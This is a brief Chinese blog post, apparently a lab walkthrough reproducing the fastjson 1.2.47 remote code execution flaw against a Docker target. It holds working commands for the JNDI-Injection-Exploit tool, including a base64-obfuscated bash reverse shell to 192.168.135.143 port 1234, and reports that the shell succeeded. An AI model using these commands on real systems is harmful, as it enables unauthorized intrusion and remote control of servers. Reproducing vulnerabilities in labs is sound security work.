fastjson 1.2.47漏洞复现

fastjson1.2.47 rce

访问首页

fastjson 1.2.47漏洞复现_第1张图片

用fastjsonscan找到poc

fastjson 1.2.47漏洞复现_第2张图片

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/lc" -A "192.168.135.143"  在tmp目录下写入lc文件

fastjson 1.2.47漏洞复现_第3张图片

sudo docker exec -it fb8 /bin/bash   写入成功

fastjson 1.2.47漏洞复现_第4张图片

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xNDMvMTIzNCAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.135.143" 

fastjson 1.2.47漏洞复现_第5张图片

反弹shell成功

你可能感兴趣的:(python,chrome,开发语言)